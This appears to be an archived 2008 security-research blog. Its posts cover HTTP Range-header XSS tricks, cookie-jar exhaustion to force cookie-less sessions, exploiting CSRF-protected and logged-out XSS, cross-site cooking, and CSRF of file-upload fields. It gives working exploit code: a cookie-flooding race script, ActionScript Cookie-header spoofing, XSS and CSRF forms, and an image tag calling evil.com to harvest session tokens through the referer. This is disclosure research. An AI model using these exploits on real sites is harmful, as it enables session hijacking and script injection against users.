Saturday, February 23, 2008

HTTP Range & Request-Range Request Headers

For those that haven't heard of the Range header, here's a link: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.2

For everyone who can't be bothered reading a link: essentially, the Range header is what you use to ask a server for part of a response rather than the whole response; it's what makes resumable downloads possible over HTTP.

Anyway, another piece of research I presented at 24c3 is pretty simple, but rather useful:

Flash



If Flash were to allow us to send a Range header, then we would be able to get things sent to us completely out of context.

Until Apache 2.0, this header was only honoured when requesting static files, so it could not influence a typical XSS. However, if we have an application such as vBulletin, which protects against FindMimeFromData XSS attacks by searching the first 256 bytes of an upload for certain strings, then we can simply place our strings after the first 256 bytes and get Flash to send a header which looks like this:
Range: bytes=257-2048
so that the unscanned data is sent as the first bytes of the response, leading to XSS.

However since Apache 2.0 (and possibly in other webservers, but they're irrelevant to this post), the Range handling code is implemented as a filter; this means that it is applied to the output of every request, even if they are dynamic requests.

This means that if we have a normally unexploitable XSS condition, where our user input is printed to the page inside an attribute with quotes either encoded or stripped but all other metacharacters left intact, or where an XSS filter did not encode the HTML attributes at all, like so:
<a href="http://site.com/<script>alert(1)</script>">link</a>

Then we could use the Range header to request only our unencoded portion, which would result in XSS.

Now, why is this important since Flash has never let anyone send a Range header?

Well, while looking through the Apache source code I found this beautiful snippet:
if (!(range = apr_table_get(r->headers_in, "Range"))) {
    range = apr_table_get(r->headers_in, "Request-Range");
}


Which essentially says that if you can't find a Range header, look for a Request-Range header; and until the latest version of Flash (9,0,115,0), the Request-Range header was not blocked. (I had hoped this would be unpatched when I presented it, but you can't really hope for much when you sit on a bug for almost half a year...)

Firefox


Now the part I didn't present. Firefox 3 implements the new Cross-Site XMLHttpRequest which, as the name suggests, lets you make cross-site requests and read the responses.

There is some documentation here: http://developer.mozilla.org/en/docs/Cross-Site_XMLHttpRequest

The part of those specs which is relevant to this post is that you can allow Cross-Site XMLHttpRequests by including an XML processing instruction; however, you can't just XSS it onto the page as usual, because it needs to come before any other data.

However, the XMLHttpRequest object allows you to append both Range and Request-Range headers, and by appending a Range header we can push our XSS-ed instruction to the start of the response, and then read the response.
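
To make this concrete, here is a minimal sketch (the hostname, injected parameter and byte offsets are hypothetical) of what the attacking page might run:

var xhr = new XMLHttpRequest();
// Our injected <?access-control allow="*"?> instruction starts at,
// say, byte 1000 of the page; the Range header makes it the first
// thing in the response, so Firefox parses it and permits the read.
xhr.open("GET", "http://site.com/page.php?q=" + encodeURIComponent('<?access-control allow="*"?>'), true);
xhr.setRequestHeader("Range", "bytes=1000-99999");
xhr.onreadystatechange = function () {
    if (xhr.readyState == 4) {
        alert(xhr.responseText); // everything after our injection point
    }
};
xhr.send(null);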

The limitations with this are fairly strict. As far as I can tell, you cannot add to the XHR policy cache with XML instructions, only with headers. And if you attempt to request multiple ranges, the multipart boundary which begins the response will be sent before the XML instruction, so the instruction will not be parsed; this means you can only read the contents of the page that come after your XSS point. On the other hand, I wasn't even able to get non-GET requests to work with server-side co-operation, so take these with a handful of salt.

On the up side, this does bypass the .NET RequestValidation mechanism, since that does not flag on <?. I doubt this will be very exploitable in many scenarios, but given the number of .NET apps which are only protected by the RequestValidation mechanism, you're sure to find something.

Friday, February 22, 2008

Racing to downgrade users to cookie-less authentication

Be warned: this post is a bit out there, and not extremely practical, but I'm posting exploit code and I thought the attack was fun.

If you ever disable cookies and try to use the web, you will notice that a surprising number of websites that use sessions still work, especially if they are using a session management framework, or were written during the browser wars when a significant number of people still didn't have cookie support in their browser, or were suspicious enough to have it disabled.

All of the cookie-less authentication systems rely on the same idea: passing session tokens through the URL. Other than being bad practice because it gets logged, etc, FUD, etc, the tokens also get leaked through referers to 3rd parties. So if we can get a persistent image pointing to our server, then we will have the session tokens leaked to us. And it does have to be persistent, because unlike cookies, session tokens passed in the URL are not implicit and are not attached to our reflected HTML injections.
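
For example, a hypothetical persistent injection as simple as this is enough; when a cookie-less user views the page, the session token in the URL is sent to us in the Referer header:

<img src="http://evil.com/log.gif" />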

However this is usually never raised as an issue because everyone has cookies enabled these days, and this attack doesn't work against anyone.

However, how do web applications which need to work without JavaScript detect whether a user's browser supports cookies? They simply set a cookie, and then when the user logs in they verify whether the cookie was sent back; if it was not, they start putting the session id in all the links and forms on a page. Some applications also check on every subsequent page whether they can set a cookie, and if they can, there is no way to degrade to cookie-less auth again.

As I wrote previously, I discovered that in Firefox and Opera we can exhaust the cookie limit to delete the user's old cookies.

If we assume the user is browsing both a site which degrades to cookie-less auth and our malicious site at the same time, then you can see that there is a race condition between when the server sets the cookie and when the user logs in (and in some applications, between when a page is served and the next HTML request is made).

The question is; can we win this race?

In Firefox, it takes approximately 100 milliseconds on my machine to set 1000 cookies over 20 hostnames, with 1 hostname per iframe. So we can win any race.

In my testing Opera is much faster at navigating between pages and setting cookies, however I'm still unsure if we can win this race in Opera.

I think the code at the end of this post can be improved by having the iframes on hostnames which look like a.b.c.d....z.123.ccTLD, are 256 characters long, and are made up of 126 levels, where the first 125 levels are single-character portions, so as to maximise the number of levels in the hostname.

And then in each iframe we would set the max number of cookies for .a.b.c.d....z.123.ccTLD, then .b.c.d....z.123.ccTLD, then .c.d....z.123.ccTLD, etc., until we set a cookie for 123.ccTLD. This would mean we do not have to navigate between pages at all, and we could hit Opera's 65536 max cookie limit in 18 iframes; however, before doing this we might have to force a lookup of all 2815 hostnames so that we don't hit a bottleneck in Opera's cross-site cooking code.
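
As a rough sketch (hypothetical hostnames, using Opera's per-host limit of 30), each iframe could do something like this:

// Running on a.b.c.....123.ccTLD: walk up the hostname one level at a
// time, filling the per-host cookie quota at each level, with no page
// navigation required.
var parts = location.hostname.split('.');
while (parts.length >= 2) {
    var domain = '.' + parts.join('.');
    for (var n = 0; n < 30; n++) {
        document.cookie = 'x' + n + '=1; domain=' + domain;
    }
    parts.shift();
}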

However, if we cannot get things as fast as in Firefox, we may still be able to win some races.

A lot depends on the application, but the easiest case is where we only have to win one race and can keep racing, such as the Phorum software which runs sla.ckers.org; it sets a temporary cookie whose existence it checks when you log in, and if it is not there when you log in, it uses cookie-less auth for the whole session.

So our race here is against how long it takes the user to fill in the login page; and considering that if we lose the race we end up deleting all the cookies, we simply race again and again.

vBulletin on the other hand, is a much tougher beast. It tries to set a cookie on every page, even when you have begun using cookie-less auth, and also has a redirect page which redirects you in 2 seconds.

So not only do we have to win every race until a user views our image, we also have to be able to beat a two second race.

We can probably stop the redirect happening by simply running our code (which lags the system a bit), and winning the race like that, but winning the race 100% of the time may still be difficult, and would lag the system enough for the user to think of closing the tab/window.

However, when we race we race against everything, so the code we use is identical between applications, and would only have to change between browsers.

Anyway, here's some code for Firefox which spins when it doesn't need to be racing (i.e. when it has completely saturated the cookie jar, and writing any additional cookie would simply overwrite earlier cookies that our script set), so that it only lags the system in bursts.

You need to have 20 subdomains set up which point to the second file (the easiest way to do this is just wildcard DNS), and the first file set up on the parent domain, e.g. [1-20].localhost & localhost.

main.php:
<html>
<body>
<script>
// Explicitly set document.domain so the subdomain frames can talk to us.
document.domain = document.domain;

var numloaded = 0;
var tries = 0;

// Called by each child frame once it has loaded.
function loaded() {
    if (++numloaded == 20) {
        go();
    }
}

var numnotified = 0;

// Called by each child frame when it has finished setting its cookies.
function notify() {
    if (++numnotified == 20) {
        numnotified = 0;
        window.setTimeout('poll()', 300);
    }
}

var time = new Date();

// Fill the cookie jar: one cookie here, 50 in each of the 20 frames.
function go() {
    numnotified = 0;
    document.cookie = 'testing=1';
    for (var n = 0; n < 20; n++) {
        window.frames[n].go();
    }
}

// Spin until any of our cookies have been evicted, then race again.
function poll() {
    var missing = 0;
    for (var n = 0; n < 20; n++) {
        missing = missing + window.frames[n].poll();
    }
    if (missing > 0) {
        go();
    } else {
        window.setTimeout('poll()', 300);
    }
}

</script>
<?php
for ($i = 0; $i < 20; $i++) {
    print '<iframe src="http://'.($i+1).'.localhost/cookie_sub.php" style="visibility: hidden" width="1" height="1"></iframe>';
}
?>
</body>
</html>


cookie_sub.php:
<?php
header("Expires: Fri, 17 Dec 2010 10:00:00 GMT"); // To speed up repeated attacks
?>
<html>
<body>
<script>

document.domain = 'localhost';
window.parent.loaded();

// Set this host's 50 cookies (Firefox's per-host limit).
function go() {
    for (var n = 0; n < 50; n++) {
        document.cookie = n + "=1";
    }

    window.parent.notify();
}

// Report 1 if any of our cookies have been evicted, 0 otherwise.
function poll() {
    if (document.cookie.split('; ').length == 50) {
        return 0;
    } else {
        return 1;
    }
}

</script>
</body>
</html>

Exploiting CSRF Protected XSS

XSS vulnerabilities which are protected by CSRF protections are usually considered unexploitable, due to the fact that we have no way of predicting the CSRF token.

However, these protections do nothing more than check that the user is first "logged in" and that the CSRF token they sent is tied to their session; nowhere in this chain of events is there a condition which states that an attacker must be forcing the victim to use their own session identifier (cookie).

If we are able to force the victim to send a request which contains the attacker's cookie, CSRF token and XSS payload, then we will pass the CSRF protection checks and have script execution.

A General Case



So how would we go about this? As I mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post, Flash (until 9,0,115,0, and not in IE) allows us to spoof the Cookie header for a single request; however, this suffers from the same problem: we cannot completely over-write cookies, only add an additional Cookie header.

This is indeed a possible attack vector though; if we first make sure the user is "logged out" (and also has no value for the login cookie), either by simply waiting, using a CSRF attack to log the user out (and hoping the website also clears its cookies), or exhausting the browser's cookie limit, we can then add our own Cookie, CSRF token and XSS payload to the request using similar Flash code, e.g.

class Attack {
    static function main(mc) {
        var req:LoadVars = new LoadVars();
        req.addRequestHeader("Cookie", "PHPSESSID=our_valid_session_id");
        req.x = "y";
        req.send("http://site.com/page.php?csrf_token=our_csrf_token&variable=",
                 "_self", "POST");
        // Note: The method must be POST, and must contain
        // POST data, otherwise headers don't get attached
    }
}


Then the application will receive a request with our (the attacker's) session id, a valid CSRF token and our XSS payload from the victim's browser.

Of course, the problem with this is that if the user is actually logged out (which we forced, due to our inability to simply over-write the cookie or stop it being sent) and the browser no longer has the victim's cookies, the only attacks we have from this point are the other attacks mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post. And while this is not ideal, it does at least give us something other than an unexploitable XSS.

Cookie tricks


Again, with this technique we can also set a cookie for the specific path, either by having an XSS on a related subdomain or by abusing a cross-site cooking bug, and then the user will still have their original cookie intact, and we can simply remove our own cookie from the user's browser once our XSS has fired.
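
A rough sketch (hypothetical domain, path and session id) of what the XSS on the related subdomain would do:

// Shadow the session cookie only for the vulnerable page's path;
// the user's original cookie (path=/) remains intact.
document.cookie = 'PHPSESSID=our_valid_session_id; domain=.site.com; path=/vuln.php';
// After our XSS has fired, expire our cookie to restore normality:
document.cookie = 'PHPSESSID=x; domain=.site.com; path=/vuln.php; expires=Thu, 01 Jan 1970 00:00:00 GMT';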

Abusing RequestRodeo


Another case where the user would be logged out is the case where we can somehow get the cookies stripped from the user's request.

The technique I presented at 24c3 abused one such piece of software: the RequestRodeo Firefox extension, created by Martin Johns and Justus Winter, which does a good job of protecting against a lot of CSRF attacks by stripping cookies from requests originating from 3rd party sites (i.e. a request going to site.com which was induced by evil.com will not have any cookies attached to it). Which is just what we need.

Of course, this is a niche piece of software that doesn't really provide a valid avenue for exploitation in almost any scenario, but as I explained in my post "Understanding Cookie Security", we can also delete all of a user's cookies by exhausting the browser's global limit on the number of cookies it will store.

Anyway, given that RequestRodeo strips all cookies (including the ones we are attempting to send via Flash), we still face the problem that we need to be sending a valid session identifier to match our valid CSRF token. We do not face this problem when we delete the user's cookies and use the Flash approach outlined above, but we can also use the following approach, which has the added benefit of working on everyone (not just those who are unpatched).

Anyway, one interesting feature of PHP and other frameworks is that they accept session identifiers through the URL. This has of course led to easily exploitable Session Fixation attacks; however in PHP at least, if a cookie is being sent, then the value in the URL is completely ignored.

In our case, no cookie is being sent, since it is either being stripped by RequestRodeo or has been deleted by us, so we can simply supply our session identifier through the URL, attach our CSRF token and XSS payload, and we're done; except that in this case the browser still has the user's cookies, and our XSS functions like normal.
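
For example (hypothetical page, token and session id), the request we force the victim's browser to make might look like:

http://site.com/page.php?PHPSESSID=our_valid_session_id&csrf_token=our_csrf_token&variable=<script>alert(1)</script>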

The result of this attack is the same as the above if we have deleted the cookies from the user's browser; however, if we have stripped the cookies with RequestRodeo or some similar tool/technique, then we have the further benefit of the user still being logged in when our XSS fires.

Other Cookie Tricks


As I wrote in my post "Understanding Cookie Security", if we have an XSS which is largely unexploitable (except via pure Session Fixation) since it is on a subdomain with no accounts, we can use it to set almost arbitrary cookies for other subdomains.

This gives us a perfect avenue, since we can set the path to only over-write cookies for our single CSRF protected XSS page, and then send the appropriate CSRF token and XSS payload for it.

Self-Only CSRF Protected Persistent XSS


One case which is much simpler to exploit than the general case, though, is where there are CSRF protections on the form where you submit the actual XSS, but the XSS is a persistent XSS for the user, in that it is rendered on another page (which is itself not CSRF protected, since it is used to display rather than edit data).

CAPTCHAs As CSRF Protections


CAPTCHAs are not designed to be CSRF protections, and in certain cases are bypassable.

There are essentially two (not completely broken) types of CAPTCHA systems I have seen in widespread use. One is where the plaintext is simply stored in the server-side session and the CAPTCHA is included in a form like this:
<img src="captcha.php" />
The other is when a form has a hidden input tag which contains a value which is also inside the image URL, like so:
<input type="hidden" name="captcha_id" value="1234567890" />
<img src="captcha.php?id=1234567890" />


The first system is trivially bypassed for CSRF & CSRF Protected XSS attacks by simply inserting the CAPTCHA onto a page, or inside an iframe (to strip/spoof referers), and asking the user to solve it.

The second can often be trivially bypassed for CSRF & CSRF Protected XSS attacks, since the id is usually not user-dependent and the CAPTCHA system does not keep track of which id it sent to which user. Therefore the attacker can simply retrieve the appropriate CAPTCHA, solve it, and put the answer along with the corresponding CAPTCHA id in the CSRF or CSRF protected XSS attack.
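
For instance, the attack page against the second system might look something like this (hypothetical target form and field names; the attacker fetched captcha.php?id=1234567890 and solved it beforehand):

<form method="post" action="http://site.com/comment.php" id="f">
<input type="hidden" name="captcha_id" value="1234567890" />
<input type="hidden" name="captcha_answer" value="solved_text" />
<input type="hidden" name="comment" value="<script>alert(1)</script>" />
</form>
<script>document.getElementById('f').submit();</script>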

Conclusion


So essentially if we can somehow trick the application into using an attacker's session identifier, either by altering the cookie (e.g. via subdomain tricks, Flash, injecting into Set-Cookie headers, or whatever other trick we can come up with), or by suppressing or deleting the cookie and passing the identifier through another means such as the URL, then all CSRF protected XSSs are exploitable.

However if we cannot, then we can still exploit some scenarios such as self-only CSRF protected persistent XSS if the logout/login functionality is not CSRF-protected (which very few are). And we can also bypass the semi-CSRF protection of CAPTCHAs in several cases.

Exploiting Logged Out XSS Vulnerabilities

Usually when we consider vulnerabilities which are only rendered when a user is logged out (e.g. a side bar which renders a vulnerable login form when logged out, and a menu otherwise), the known methods of attack lie in, first getting the user logged out, and then doing one of the following:

  • Extracting login information from the Password Manager

  • Modifying a client-side data store, such as cookies or Flash LSO's to create an attack which fires later when a user is logged in

  • Conducting a Session Fixation attack



Some new possibilities for attacking these vulnerabilities are:


  • Reading the Browser Cache via XSS

  • Semi-Logging the User Out



Reading the Browser Cache via XSS


Most browsers do not let you read pages which have not been explicitly cached, i.e. where the Expires or Cache-Control headers have not been set; Internet Explorer, however, does.

If you use the XmlHttpRequest object to make a request to a resource which has no caching information attached to it, you will simply get back the cached copy, which may contain sensitive information such as the person's billing details, or other juicy information you can use in other exploits.
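
As a sketch (hypothetical page name), an XSS payload running in IE after the user has logged out could do something like this:

// No caching headers on account.php means IE serves its cached copy,
// which was rendered while the user was still logged in.
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
xhr.open('GET', 'http://site.com/account.php', false);
xhr.send(null);
alert(xhr.responseText);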

But since security people have been parroting on about how websites need to make sure that they don't let the browser cache things, because the user may be using a public computer, etc, this is much less viable; however, at least we now have a real reason to recommend that people not let the browser cache things.

Semi-Logging the User Out


However, before we jump to the conclusion that the vulnerability is only triggered when the user is logged out, let us consider what it really means to be "logged in".

To be "logged in" is to send the web application a cookie header which gets parsed by the server/web application framework (e.g. Apache/PHP), and the parsed value is associated by the application with a valid session.

So conversely, when are you "logged out"? You're logged out whenever the above series of events (plus any other steps I missed) don't fall exactly into place.

So if we start with a user who is currently logged in, instead of logging them out completely via CSRF (or just waiting until they log themselves out), the trick here is to create an exploit which fires while the browser still holds the user's cookies, but the application doesn't receive those cookies intact.

The easiest and most generic place (I found) to attack this chain is to alter what the browser sends, and therefore the server receives.

Until the latest version of Flash (which is 9,0,115,0), the following code ran properly and let us tamper with the Cookie header:

class Attack {
    static function main(mc) {
        var req:LoadVars = new LoadVars();
        req.addRequestHeader("Cookie", "PHPSESSID=junk");
        req.x = "y";
        req.send("http://site.com/page.php?variable=",
                 "_self", "POST");
        // Note: The method must be POST, and must contain
        // POST data, otherwise headers don't get attached
    }
}


Unfortunately this does not work in IE, since IE seems to stop plugins from playing with the Cookie headers it sends.

Furthermore, this does not actually replace the Cookie header which the browser sends; rather, it forces the browser to send an additional Cookie header, which would make the relevant part of the HTTP request look something like this:

Cookie: PHPSESSID=valid_id
Cookie: PHPSESSID=junk


Which PHP (and pretty much every other Server/web application framework) would reconcile into the single PHPSESSID value of:

valid_id, PHPSESSID=junk

Which is of course not a valid session token, so the application treats the user as logged out, and our XSS executes as if the user were logged out; however, since the browser still has all the cookies, we can either steal them or get the user to perform actions on our behalf, etc.

The less generic, but still working, approach is to overwrite the cookies for your particular path only, either via an XSS on a related subdomain or by abusing a cross-site cooking bug in a browser (check my last post).

Understanding Cookie Security

Whenever anyone decides to talk about XSS, one thing which is sure to pop up is the Same Origin Policy, which XSS avoids by being reflected by the server. The Same Origin Policy is the security restriction which makes sure that any pages trying to communicate via JavaScript are on the same protocol, domain and port. However, this is misleading, since it is not the weakest link browsers have between domains.

The weakest link across domains is (for lack of a better term) the cookie policy which determines which domains can set cookies for which domains and which cookies each domain receives.

What's in a cookie


The cookies we use have several fields, including these ones I want to talk about:

  • Name

  • Value

  • Domain

  • Path

  • Expires



First, it must be noted that the protocol restriction which is explicit in the Same Origin Policy is implicit here: since cookies are an extension to HTTP, they are only sent over HTTP; however, the distinction between http and https is only enforced if the Secure flag is set.

Secondly, unlike the same origin policy, the cookie policy has no restrictions on ports, explicit or implicit.

And furthermore the domain check is not exact. From RFC 2109:
   Hosts names can be specified either as an IP address or a FQHN
string. Sometimes we compare one host name with another. Host A's
name domain-matches host B's if

* both host names are IP addresses and their host name strings match
exactly; or

* both host names are FQDN strings and their host name strings match
exactly; or

* A is a FQDN string and has the form NB, where N is a non-empty name
string, B has the form .B', and B' is a FQDN string. (So, x.y.com
domain-matches .y.com but not y.com.)

Note that domain-match is not a commutative operation: a.b.c.com
domain-matches .c.com, but not the reverse.


Effectively, this means that any subdomain of a given domain can set, and is sent, the cookies for that domain, i.e. news.google.com can set, and is sent, the cookies for .google.com. Furthermore, a second subdomain, e.g. mail.google.com, can also set, and is sent, the cookies for .google.com. This effectively means that by setting a cookie for google.com, news.google.com can force the user's browser to send a cookie to mail.google.com.
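
In other words, this single line run from news.google.com (purely illustrative) plants a cookie which mail.google.com will receive:

document.cookie = 'user=attacker_value; domain=.google.com; path=/';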

Resolving Conflicts


But what if two cookies of the same name should be sent to a given page, e.g. if there is a cookie called "user" set for mail.google.com and .google.com with different values, how does the browser decide which one to send?

RFC 2109 states that the cookie with the more specific path attribute must be sent first; however, it does not define how to deal with two cookies which have the same path (e.g. /) but different domains. If such a conflict occurs, most (all?) browsers simply send the older cookie first.

This means that if we want to overwrite a cookie on mail.google.com from the subdomain news.google.com, and the cookie already exists, then we cannot over-write a cookie with the path value of / (or whatever the path value of the existing cookie is), but we can override it for every other path, up to the maximum number of cookies allowed per host (50 in IE/Firefox, 30 in Opera). I.e. if we pick 50 (or 30 if we want to target Opera) paths on mail.google.com which encompass the directories and pages we want to overwrite the cookie for, we can simply set 50/30 separate cookies which are all more specific than the existing cookie.
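
A sketch of this (hypothetical paths, running via an XSS on news.google.com):

// We can't beat the existing path=/ cookie directly, but cookies with
// more specific paths are sent first, so the application sees our
// value on these pages.
var paths = ['/mail/', '/mail/inbox.php', '/account/'];
for (var i = 0; i < paths.length; i++) {
    document.cookie = 'user=our_value; domain=.google.com; path=' + paths[i];
}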

Technically, the spec says that a.b.c.d can only set cookies for .b.c.d, not for a.b.c.d itself or for anything higher up such as .c.d, but none of the browsers enforce this since it breaks sites. Also, sites should not be able to set a cookie with a path attribute which would not apply to the current page, but since path boundaries are non-existent in browsers, no-one enforces this restriction either.

Cross-Site Cooking


When you think about the problem in the above scenario, you end up asking: can I use the same technique to send a cookie from news.com to mail.com? Or some similar scenario where you are going from one privately owned domain to another in a public registry. The RFC spec did foresee this to some degree and came up with the "one dot rule", i.e. that you can't set a cookie for a domain which does not have an embedded dot, e.g. you cannot set a cookie for .com or .net, etc.

What the spec did not foresee is the creation of public registries such as co.uk which do contain an embedded dot. And this is where the fun begins, since there is no easy solution for this, and the RFC has no standard solution, all the browsers pretty much did their own thing.

IE has the least interesting and most restrictive system: you cannot set a cookie for a two letter domain of the form ab.xy, or for (com|net|org|gov|edu).xy. Supposedly there is a key in the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\SpecialDomains which will let you whitelist a domain so that a cookie for ab.xy can be set; my registry has the value "lp. rg." for that key, but I haven't been able to set a cookie for ab.pl or ab.rg, so go figure.

Opera, on the other hand, has perhaps the most interesting system of all the browser vendors. Opera does a DNS lookup on the domain you are trying to set a cookie for, and if it finds an A record (i.e. the domain has an IP address associated with it) then you can set a cookie for it. So if ab.xy resolves to an IP then you can set a cookie for it; however, this breaks down when the TLD itself resolves, as is the case for co.tv.

Firefox 2 seems to have no protections. I was unable to find any protections in the source and was able to get foobar.co.uk to set cookies for .co.uk, so ummm, why does no-one ever mention this? I have no clue....

Firefox 3 on the other hand has a huge list of all the domains for which you cannot set cookies, which you can view online here. Hurray for blacklists.....

Exhausting Cookie Limits


Another interesting aspect of cookies is that there is a limit on how many cookies can be stored, not only per host, but in total, at least in Firefox and Opera. IE doesn't seem to have such a restriction.

In Firefox the global limit is 1000 cookies with 50 per host (1.evil.com and 2.evil.com are different hosts), and in Opera it is 65536 cookies with 30 per host. IE does not seem to have a global limit, but does have a per-host limit of 50 cookies. When you reach the global limit, both browsers go with the RFC recommendation and start deleting cookies.

Both Firefox and Opera simply choose to delete the oldest cookies, so by setting either 1000 or 65536 cookies, depending on the browser, you effectively clear the user's cookie jar of anything any other domain has set.

Conclusion


By setting the path attribute to point to more specific pages, we can effectively overwrite other sites' cookies on any domain we can set cookies for, which includes all the co.xy domains. Also, if we are attacking Firefox or Opera, we can simply delete the existing cookies if we need to force our cookie to be sent for a path which already has a cookie set (e.g. /).

You may also be able to induce some weird states if you somehow manage to delete only one cookie where an application expects two, or similar, but I doubt that would be very exploitable.

CSRF-ing File Upload Fields

It seems I'm destined to have everything I sit on for a while patched or found and disclosed by someone else, *sigh*, I guess that's the way things go though.

Oh well, pdp has an interesting post over at gnucitizen.org about how to perform CSRF attacks against File upload fields using Flash: http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/

Since there would be no point publishing this later, here is the method I came up with a while ago to CSRF file upload fields:

<form method="post" action="http://kuza55.awardspace.com/files.php" enctype="multipart/form-data">
<textarea name='file"; filename="filename.ext
Content-Type: text/plain; '>Arbitrary File
Contents</textarea>
<input type="submit" value='Send "File"' />
</form>


It relies on a bug in Firefox/IE/Safari where form field names are not escaped before being put into the POST body, which lets us set the filename parameter and Content-Type header.
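
When the form is submitted, the browser interpolates the unescaped name attribute straight into the multipart body, so the relevant part of the request looks roughly like this:

Content-Disposition: form-data; name="file"; filename="filename.ext
Content-Type: text/plain; "

Arbitrary File
Contents
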

Note: http://kuza55.awardspace.com/files.php is probably vulnerable to a tonne of things; I'm not too worried as it's on free hosting.